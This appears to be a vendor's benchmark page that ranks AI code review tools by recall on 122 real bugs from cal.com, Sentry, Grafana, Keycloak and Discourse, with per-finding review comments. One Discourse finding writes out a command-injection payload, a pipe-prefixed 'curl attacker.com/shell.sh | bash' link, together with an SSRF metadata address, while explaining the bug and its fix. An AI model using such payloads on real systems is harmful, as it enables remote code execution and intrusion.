How well do AI code reviewers catch real bugs?
In this independent 2026 benchmark of 6 leading AI code review tools, Tenki catches 84 of 122 real, production bugs across 50 pull requests from cal.com, Sentry, Grafana, Keycloak, and Discourse, graded per finding by a 3-judge LLM panel. That's 1.9× the next-best reviewer.
How we benchmarked AI code reviewers
Every pull request contains a real, merged bug-fix from an open-source codebase. We replay the bug-introducing diff into a clean fork and let each tool review it with its default configuration. Reviews are then graded by a 3-LLM judge panel using majority vote. No synthetic bugs, no repo-specific tuning.
50 bug-fix PRs from 5 open-source repositories
Real merged fixes from cal.com (TypeScript), sentry (Python), grafana (Go), keycloak (Java), and discourse (Ruby). All five major server-side languages are represented in the bug set.
Real bugs reintroduced, not invented
The pre-fix diff is replayed against every tool with default settings: no custom rules, no repo-specific tuning, and full repository context for every reviewer. Every tool sees the same code at the same point in history.
Per-finding 3-judge LLM majority vote
Each individual bug is scored separately. A finding is counted as caught only when a line-level comment explicitly identifies the faulty code and explains the impact, and the majority of three independent LLM judges agrees. Per-PR scoring is avoided because it over-credits drive-by comments.
Leaderboard: recall, precision, and F1 across every real bug
Each individual bug is scored, not each pull request. Recall is the share of real bugs caught. Precision is the share of a tool's comments that flag a real bug. F1 is the harmonic mean of recall and precision and drives the ranking.
Higher-precision tools post fewer comments overall. Tenki's higher comment volume drives both higher recall and lower precision; see methodology for how each metric is computed.
Coding agents are bundled into the IDE and review their own work in-loop, not post-hoc on a PR diff. Shown here for context, not as an apples-to-apples comparison.
Tenki vs Devin: the closest AI code reviewer
Devinis the runner-up by F1 score in this benchmark. Tenki's lead is widest at the finding level, where recall (the share of real bugs caught) matters most for engineering teams who need coverage they can trust.
Do AI code reviewers catch the bugs that actually matter?
Catch rate broken down by the severity of the individual finding. Critical bugs cause outages, data loss, or auth bypass. High-severity bugs break major user-facing flows. Medium bugs degrade behavior without breaking it. The severity that matters most for production reliability is the first column.
Performance per codebase: cal.com, Sentry, Grafana, Keycloak, Discourse
Per-repository recall: the share of real bugs each AI code reviewer caught in each codebase. The Tenki Δ column is the gap, in percentage points, between Tenki and the next-best reviewer for that repo.
| Repository | Tenki | CodeRabbit | Copilot | Cursor | Devin | Graphite | Greptile | Tenki Δ |
|---|---|---|---|---|---|---|---|---|
cal.com 33 bugs | 91% 30/33 | 21% 7/33 | 21% 7/33 | 30% 10/33 | 33% 11/33 | 0% 0/33 | 30% 10/33 | +57.6pp |
sentry 31 bugs | 55% 17/31 | 16% 5/31 | 6% 2/31 | 13% 4/31 | 29% 9/31 | 0% 0/31 | 13% 4/31 | +25.8pp |
discourse 22 bugs | 73% 16/22 | 36% 8/22 | 32% 7/22 | 32% 7/22 | 27% 6/22 | 5% 1/22 | 50% 11/22 | +22.7pp |
keycloak 15 bugs | 67% 10/15 | 40% 6/15 | 47% 7/15 | 47% 7/15 | 27% 4/15 | 0% 0/15 | 53% 8/15 | +13.3pp |
grafana 21 bugs | 52% 11/21 | 43% 9/21 | 33% 7/21 | 52% 11/21 | 67% 14/21 | 14% 3/21 | 52% 11/21 | -14.3pp |
Every real bug, every reviewer verdict
One row per real bug. 122 distinct findings across 50 production pull requests. Each cell shows whether that AI code reviewer flagged that specific finding. Yes/No is decided by a 3-LLM majority vote; hover a cell for judge-by-judge votes, or click ✓/✕ to open the actual review on GitHub. Filter by severity or repository below. Critical bugs are shown by default.
| # | Repo · PR | Finding | Severity | Tenki | CodeRabbit | Copilot | Cursor | Devin | Graphite | Greptile |
|---|---|---|---|---|---|---|---|---|---|---|
| 001 | cal.com · #3 | Backup-code login bypasses password verification packages/features/auth/lib/next-auth-options.ts authorize():
if (user.password && !credentials.totpCode) {
// verify password via verifyPassword(credentials.password, user.password)
}
if (user.twoFactorEnabled && credentials.backupCode) {
// accept backup code as 2FA factor
} else if (user.twoFactorEnabled) {
// verify totpCode
}
Submitting `credentials.totpCode = <anything truthy>` (it does not need to be valid because the new branch only consumes backupCode) makes `!credentials.totpCode` false and skips the password block entirely. The backup-code branch then accepts the credential and the user is logged in. Effect: an attacker who has any single backup code can sign in without the account password — backup codes become permanent password replacements rather than recovery factors. The fix is to verify the password unconditionally when user.password is set (regardless of totpCode/backupCode presence) and only use backupCode in place of totpCode, not in place of password. | Critical | ✕ | ✕ | ✕ | ✕ | ✓ | ✕ | ✕ |
| 002 | cal.com · #8 | Missing `prisma` import in SalesforceCalendarService causes runtime crash+ext **🚨 Missing `prisma` import in SalesforceCalendarService causes runtime crash** (bug)
In `packages/app-store/salesforce/lib/CalendarService.ts`, `prisma.credential.update` is called on line 96 to persist refreshed tokens, but `prisma` is never imported. There is no `import prisma from "@calcom/prisma"` in the file. This will throw a `ReferenceError: prisma is not defined` at runtime whenever Salesforce credentials need a token refresh.
**💡 Suggestion**: Add `import prisma from "@calcom/prisma";` to the import block at the top of the file.
<details>
<summary>📋 Prompt for AI Agents</summary>
In packages/app-store/salesforce/lib/CalendarService.ts, add a missing import for prisma. After the existing import block (around line 20), add: `import prisma from "@calcom/prisma";`. This is required because `prisma.credential.update` is called on line 96 to persist refreshed tokens, but the module is never imported, causing a ReferenceError at runtime.
</details> | Critical | ✓ | ✕ | ✕ | ✕ | ✕ | ✕ | ✓ |
| 003 | discourse · #4 | best.html.erb closes if/else with `<%- end if %>` — invalid Ruby, view crashes app/views/embed/best.html.erb (added in this PR) opens an if/else at lines 2-6:
<%- if @topic_view.posts.present? %>
...
<%- else %>
...
<%- end if %>
The `end if` form is Ruby's trailing-if statement modifier and requires an expression after `if` (e.g. `end if some_cond`). With no expression the template compiles to invalid Ruby and rendering raises SyntaxError. The embed view is the entry point for the new embeddable-comments feature, so any host page that embeds Discourse comments will fail to render the iframe. Fix: change to `<%- end %>`. | Critical | ✕ | ✕ | ✕ | ✕ | ✓ | ✕ | ✓ |
| 004 | discourse · #4 | SSRF via user-controlled embed_url triggers open() to arbitrary URL+ext **🚨 SSRF via user-controlled embed_url triggers open() to arbitrary URL** (security)
In `EmbedController#best` (line 9), the `embed_url` parameter comes directly from user-supplied query parameters. When no existing topic embed is found, this value is passed verbatim to `Jobs.enqueue(:retrieve_topic, embed_url: embed_url)`. Inside `Jobs::RetrieveTopic#execute`, it is passed to `TopicRetriever.new(@embed_url)`, which calls `TopicEmbed.import_remote(user, @embed_url)`, which calls `open(url).read` (Ruby's `Kernel#open` / `open-uri`). Although `TopicRetriever#invalid_host?` checks that the URL's host matches `SiteSetting.embeddable_host`, this check only runs for pre-validated embeds after the job is enqueued — the URL is already accepted by the controller before any host validation occurs (the controller only checks the HTTP Referer header, not the embed_url itself). More critically, `Kernel#open` also accepts pipe-prefixed strings (`|command`) on older Ruby/open-uri combinations that allow OS command execution. Even if host validation were reliable, a URL with a valid host prefix but path traversal (e.g. query string exploits) can reach internal services.
**💡 Suggestion**: Validate `embed_url` against the configured `embeddable_host` in the controller before enqueuing the job, not just in the retriever. Use `URI.parse` and compare the host explicitly, and reject any URL whose scheme is not `http` or `https`. Additionally, replace `open(url)` in `import_remote` with `Net::HTTP` or a whitelisted HTTP client that cannot be used for file/pipe access.
<details>
<summary>📋 Prompt for AI Agents</summary>
In app/controllers/embed_controller.rb, before calling Jobs.enqueue at line 15, add host validation of embed_url: parse it with URI.parse, verify the scheme is http/https and the host matches SiteSetting.embeddable_host, and raise Discourse::InvalidAccess if either check fails. In app/models/topic_embed.rb at line 48, replace `open(url).read` with an explicit HTTP fetch using Net::HTTP or Faraday so that file:// and pipe-exec URIs are never processed.
</details> | Critical | ✓ | ✓ | ✓ | ✕ | ✕ | ✕ | ✓ |
| 005 | discourse · #4 | SSRF and RCE via Kernel#open with attacker-controlled URL from Disqus XML+ext **🚨 SSRF and RCE via Kernel#open with attacker-controlled URL from Disqus XML** (security)
The PR replaces `PostCreator` with `TopicEmbed.import_remote(user, t[:link], ...)` at line 148. The value `t[:link]` is read directly from the `<link>` element of the Disqus XML export file (parsed at `disqus.thor:58`). Inside `TopicEmbed.import_remote` (topic_embed.rb:48), Ruby's `Kernel#open(url)` is called with this attacker-controlled value **before** any URL validation.
Ruby's `Kernel#open` has two critical behaviours beyond HTTP:
1. **Remote Code Execution**: if the URL begins with `|`, it is interpreted as a shell command. A Disqus XML containing `<link>|curl attacker.com/shell.sh | bash</link>` would execute arbitrary shell commands on the import host.
2. **SSRF / local file read**: URLs with `file://` scheme or internal addresses (e.g., `http://169.254.169.254/`) allow reading arbitrary local files or probing internal services.
The `https?://` guard in `TopicEmbed.import` (line 11) does NOT protect against this because `open(url)` in `import_remote` is called at line 48 **before** `import` is invoked at line 52. The `TopicRetriever` code path validates the host against `SiteSetting.embeddable_host`, but the Disqus importer bypasses that validation entirely.
**💡 Suggestion**: Replace `Kernel#open(url)` with an explicit HTTP client call (e.g., `Net::HTTP.get(URI(url))` or `open-uri` with explicit `URI.open`) and validate the URL scheme before fetching. Add a guard at the start of `import_remote` that rejects non-http(s) URLs (matching the guard already present in `import`). Additionally, validate `t[:link]` in `disqus.thor` before passing it to `import_remote`.
```suggestion
doc = Readability::Document.new(URI.open(url).read,
```
<details>
<summary>📋 Prompt for AI Agents</summary>
In app/models/topic_embed.rb, the `import_remote` method at line 44 uses Ruby's `Kernel#open(url)` at line 48 to fetch a URL that can originate from an attacker-controlled Disqus XML file (via lib/tasks/disqus.thor line 148). Ruby's Kernel#open executes shell commands when the string starts with '|', enabling RCE. Fix this by: (1) adding a URL scheme check at the top of `import_remote` identical to the one in `import` (line 11): `return unless url =~ /^https?:\/\//`; (2) replacing `open(url)` with `URI.open(url)` (from OpenURI) or an explicit Net::HTTP call to avoid the shell-dispatch behaviour of Kernel#open. Also add `require 'open-uri'` if not already present.
</details> | Critical | ✓ | ✓ | ✓ | ✕ | ✕ | ✕ | ✓ |
| 006 | keycloak · #6 | GroupPermissionsV2.canManage() accepts VIEW scope — privilege escalation services/src/main/java/org/keycloak/services/resources/admin/permissions/GroupPermissionsV2.java around line 70:
public boolean canManage() {
if (root.hasOneAdminRole(AdminRoles.MANAGE_USERS)) return true;
return hasPermission(null, AdminPermissionsSchema.VIEW, AdminPermissionsSchema.MANAGE);
}
The corresponding per-group `canManage(GroupModel group)` later in the same file (~line 78) correctly does `hasPermission(group.getId(), MANAGE)`. The no-arg variant must mirror that — a manage operation must require a manage scope. Accepting VIEW here means: a user granted ONLY the all-groups VIEW permission satisfies the canManage() check and can then call admin endpoints that gate on requireManage()/canManage() (GroupsResource.addTopLevelGroup, GroupResource cross-group moves, etc.). The fix is `hasPermission(null, AdminPermissionsSchema.MANAGE)`. | Critical | ✓ | ✓ | ✓ | ✓ | ✕ | ✕ | ✓ |
| 007 | sentry · #4 | OAuth state parameter is a deterministic pipeline.signature, not a per-session nonce src/sentry/integrations/github/integration.py introduces OAuthLoginView with `state = pipeline.signature` and validates the callback via `request.GET.get('state') != pipeline.signature`. Per src/sentry/pipeline/base.py:133, pipeline.signature is computed as `md5_text(*[f'{module}.{cls}' for v in self.pipeline_views]).hexdigest()` — a deterministic hash of the pipeline view class names. The value is identical for every Sentry installation that uses the same GitHub provider pipeline, so an attacker who knows the (open-source) pipeline composition can predict the state value, craft a callback URL with a stolen authorization code, and bind an attacker-controlled GitHub installation to the victim's session. The fix is to generate a per-session cryptographic nonce (e.g. secrets.token_urlsafe), store it in pipeline state, and compare against that. Recommended additions: PKCE, exact-match redirect URI validation, and rate-limit the callback. | Critical | ✕ | ✕ | ✕ | ✕ | ✕ | ✕ | ✕ |